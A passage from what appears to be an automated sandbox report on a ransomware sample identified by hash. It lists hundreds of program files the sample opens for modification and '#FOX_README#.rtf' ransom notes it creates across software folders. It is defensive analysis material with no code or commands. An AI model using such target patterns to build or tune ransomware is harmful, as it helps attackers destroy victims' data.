created C:\Program Files\VideoLAN\VLC\lua\http\js\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-services.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.exe.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-charts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Knox f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\rmiregistry.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kosrae f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sv.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Noronha f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Managua f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Minsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sr.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_it.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\LICENSE f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightItalic.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for 